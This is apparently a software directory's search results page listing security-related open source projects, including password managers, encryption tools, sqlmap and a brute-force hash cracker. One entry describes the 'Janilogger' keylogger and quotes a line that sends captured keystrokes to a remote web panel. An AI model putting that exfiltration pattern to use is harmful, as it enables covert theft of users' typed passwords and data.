Showing 492 open source projects for "no database"

View related business solutions
  • Red Hat Enterprise Linux on Microsoft Azure Icon
    Red Hat Enterprise Linux on Microsoft Azure

    Deploy Red Hat Enterprise Linux on Microsoft Azure for a secure, reliable, and scalable cloud environment, fully integrated with Microsoft services.

    Red Hat Enterprise Linux (RHEL) on Microsoft Azure provides a secure, reliable, and flexible foundation for your cloud infrastructure. Red Hat Enterprise Linux on Microsoft Azure is ideal for enterprises seeking to enhance their cloud environment with seamless integration, consistent performance, and comprehensive support.
  • Achieve perfect load balancing with a flexible Open Source Load Balancer Icon
    Achieve perfect load balancing with a flexible Open Source Load Balancer

    Take advantage of Open Source Load Balancer to elevate your business security and IT infrastructure with a custom ADC Solution.

    Boost application security and continuity with SKUDONET ADC, our Open Source Load Balancer, that maximizes IT infrastructure flexibility. Additionally, save up to $470 K per incident with AI and SKUDONET solutions, further enhancing your organization’s risk management and cost-efficiency strategies.
  • 1
    Weeny Free Password Manager

    Weeny Free Password Manager

    Manage all your passwords in an encrypted database.

    Weeny Free Password Manager is a free password manager tool to manage all your passwords in an encrypted database. You can put all your passwords in one database, which is locked with one master key or a key file. So you only have to remember one single master password or select the key file to unlock the whole database. The databases are encrypted using secure asymmetric cryptographic algorithm. The secure asymmetric cryptographic algorithm includes: 3DES, Blowfish, Cast128, DES, Ice...
    Downloads: 0 This Week
    Last Update:
    See Project
  • 2
    A Public Key Cryptographic system based on OpenSSL and MySQL.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 3
    ActiveLock is an open-source copy protection, software licensing framework for all development enviroments supporting COM+ architecture. Core DLL available in VB2008 and VB6. Samples in C++, C#, Excel/Access VBA and keygens in PHP, ASP.NET available.
    Downloads: 3 This Week
    Last Update:
    See Project
  • 4

    MD5HashCracker

    Cracks MD5 hashes using brute force attack

    The MD5 hash algorithm is widely used and is vulnerable to dictionary and brute force attacks. A dictionary attack and database will be added for this program later.
    Downloads: 2 This Week
    Last Update:
    See Project
  • Sage Intacct Cloud Accounting and Financial Management Software Icon
    Sage Intacct Cloud Accounting and Financial Management Software

    Cloud accounting, payroll, and HR that grows with you

    Drive your organization forward with the right solution at the right price. AI-powered continuous accounting and ERP to support your growth now and into the future.
  • 5
    Password Protector

    Password Protector

    Encrypt and protect passwords and usernames

    Password Protector allows you to securely store your passwords and usernames in one place using AES256 for encryption, which is the recommended cryptosystem used in Banks. Password Protector uses a master password to encrypt your passwords, but it can also use optional 'key files' - small files that are required for the encryption/decryption process. You can put the file on any portable storage you keep with you (USB sticks, phones, music players...) to add an extra layer of security -...
    Downloads: 0 This Week
    Last Update:
    See Project
  • 6
    Password Manager+

    Password Manager+

    Password manager program that helps manage passwords.

    This is a very efficient password management program that makes managing your passwords very easy and flexible with groups and a database where all your passwords are securely stored. Features include efficient random password generator, with passwords generated from user choices (uppercase, digits...), view/close columns, copy username/password, etc.
    Downloads: 1 This Week
    Last Update:
    See Project
  • 7
    Downloads: 0 This Week
    Last Update:
    See Project
  • 8
    Web KeePass Password Safe
    Web AND Mobile (Apple iPhone) based, multi user, java port of the KeePass project. A free, easy to use password manager which helps you to manage your passwords in a secure way. Focused on deep encryption and ease of use.
    Downloads: 1 This Week
    Last Update:
    See Project
  • 9
    phpLDAPadmin
    phpLDAPadmin is a web-based LDAP administration tool for managing your LDAP server. With it you can browse your LDAP tree, view LDAP schema, perform searches, create, delete, copy and edit LDAP entries. You can even copy entries between servers.
    Downloads: 73 This Week
    Last Update:
    See Project
  • PRTG Network Monitor | Making the lives of sysadmins easier Icon
    PRTG Network Monitor | Making the lives of sysadmins easier

    Stay ahead of IT infrastructure issues

    PRTG Network Monitor is an all-inclusive monitoring software solution developed by Paessler. Equipped with an easy-to-use, intuitive interface with a cutting-edge monitoring engine, PRTG Network Monitor optimizes connections and workloads as well as reduces operational costs by avoiding outages while saving time and controlling service level agreements (SLAs). The solution is packed with specialized monitoring features that include flexible alerting, cluster failover solution, distributed monitoring, in-depth reporting, maps and dashboards, and more.
  • 10
    Ralasafe Access Control Middleware focus on data-level privilege management, including database row/column and content privilege management. It also manages 2) login control; 3) function-level privilege management; and 4) URL privilege authentication
    Downloads: 0 This Week
    Last Update:
    See Project
  • 11
    Itilect FTP Proxy

    Itilect FTP Proxy

    Provide users with a managed temporary access to arbitary FTP

    This tool allows you to set proxied access for your users, using predefined FTP accounts. System works like this: Users connects to FTP proxy just like they do with a regular FTP, but using specially formed string as a username (string, that includes their internal profile name and desired target FTP) and their internal password. If they are allowed to access this host, proxy will establish connection with a target FTP and authenticate using real credentials. After that, server will act...
    Downloads: 1 This Week
    Last Update:
    See Project
  • 12
    SimpleSiteAudit Multisite

    SimpleSiteAudit Multisite

    Detect file changes on remote web sites

    Combat the hackers with ‘Simple Site Audit Multisite’ website protection. With SSAM installed, you will be notified by email of any file changes that occur on your monitored sites. SSAM will detect files that have been added, removed or modified and if file permissions are changed. You will be able to automatically monitor all your sites from one ‘Master’ web site. Your sites can be monitored for hacker activity without any detectable monitoring system on the sites themselves. The...
    Downloads: 0 This Week
    Last Update:
    See Project
  • 13
    HTTP Anti Flood/DoS Security Module

    HTTP Anti Flood/DoS Security Module

    Detect Flooder IPs, Reduce Attack Surface against HTTP Flood Attacks

    This module provides attack surface reduction enhancements against the HTTP Flood Attacks at the web application level. Massive crawling/scanning tools, HTTP Flood tools can be detected and blocked by this module via htaccess, firewall or iptables, etc. (like mod_evasive) You can use this module by including "iosec.php" to any PHP file which wants to be protected. You can test module here: http://www.iosec.org/test.php (demo) Watch the Proof of Concept video:...
    Downloads: 1 This Week
    Last Update:
    See Project
  • 14
    egrsa

    egrsa

    rsa-elgamal comparison

    compare time of process between rsa and elgamal algorithm used to encryption and digital signature.
    Downloads: 1 This Week
    Last Update:
    See Project
  • 15

    WordList Generator

    Generate wordlists using different methods

    WordList Generator is used to generate word lists. Methods: -Web Crawler -Search Engine Crawler -Random -Brute Force
    Downloads: 4 This Week
    Last Update:
    See Project
  • 16
    Encryptron

    Encryptron

    An encryption software using C# 4.0

    First of all, let us understand the need for an encryption software. Just think of you sending a message of extreme confidentiality, someone else fetches it and goes through it. A breach in the security! We can’t allow that to happen. So, virtually every data send over a network is encrypted now-a-days. Let’s look at this now: Vdmbnld!`f`ho...
    Downloads: 0 This Week
    Last Update:
    See Project
  • 17
    Password Wallet

    Password Wallet

    Progetto "Password Wallet" (Università degli Studi di Padova)

    Progetto didattico "Password Wallet" per l'insegnamento di Ingegneria del Software (Anno Accademico 2011/2012) del Corso di Laurea in Informatica dell'Università degli Studi di Padova.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 18

    DAL4j

    Data Access Layer 4 Java

    Welcome to Data Access Layer for Java (DAL4j) a set of command line tools and framework used to reverse engineer a MySQL or SQLServer database schema into a set of JPA Entity Beans. DAL4j can be useful for scenarios where there is an existing database schema but a technology other that JPA is used to interact with the database. DAL4j can provide an easy way to migrate your code base from other technologies such as JDBC or Hibernate to JPA. The beans generated can be 1 or two types: Simple...
    Downloads: 0 This Week
    Last Update:
    See Project
  • 19
    SecQua

    SecQua

    SecQua tries to quantify the security of a given Information System

    SecQua is an open source project written in Python, that tries to quantify the security of a given Information System, using a novel security metric, trying to provide a deterministic, unbiased, objective and efficient measurement. The approach is vulnerability driven and in order to get as much unbiased results, it makes use of the National Vulnerability Database. This work is mainly based on the following publications: *C. Patsakis, Gregory Chondrocoukis, D. Mermigas, S. Pirounias, The role...
    Downloads: 1 This Week
    Last Update:
    See Project
  • 20
    Janilogger

    Janilogger

    Visual Basic based keylogger program

    Janilogger collects keystrokes to a textbox. And send the collected data to website panel. The asp file send datas to database. For example: You uploaded your log.asp to x.com . Janilogger sends datas to your database via log.asp with this command Webbrowser1.Navigate("http://www.x.com/log.asp?yaz=text1.text") -Log.asp included in source files
    Downloads: 0 This Week
    Last Update:
    See Project
  • 21

    password420

    Strong Password Generator Online - Easy to remember Strong Passwords

    ... to remember a strong password. The project solves this by creating a password depot that allows the users to generate and retrieve their strong password using a dual set of pass keys. Key Features of the Password Management Tool : 1. Generate a strong 20 character password by just remember two pass keys. 2. Password stored in database as a SHA256 bit hash. 3. Two pass keys of varying length makes it difficult to retrieve the password.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 22
    sqlmap
    sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
    Downloads: 48 This Week
    Last Update:
    See Project
  • 23
    CryBit Password

    CryBit Password

    Safe and Simple

    Crybit Password Password Storage Software and on growing For details and Support: http://monstersoftware.clan.su Crybit Password Parola Saklama Yazılımdır ve Her Geçen Gün Gelişmektedir Detaylar Ve Destek için: http://monstersoftware.clan.su
    Downloads: 1 This Week
    Last Update:
    See Project
  • 24

    Xenophobe

    Block countries via iptables and gui menu with country flags.

    .... The solution exists via iptables and the geoIP database done via cmd-line. I have begun to make a simple web gui, that allows for selecting countries one would like to simply block from reaching one's server. The gui incorporates country flags as a means of selection. Eventually, this project seeks to be able to apply fine tailored restrictions, via port and protocols to firewall rules. With help, I intend to port this to Windows in the near future.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 25
    Secure Content Management System
    SCMS is an MVC based secure content management system. It is designed from the ground up to withstand common Web application vulnerabilities. It is designed for PHP 5.0-5.2.x and MySQL 4.1+, and it can optionally support PostgreSQL as a database backend.
    Downloads: 0 This Week
    Last Update:
    See Project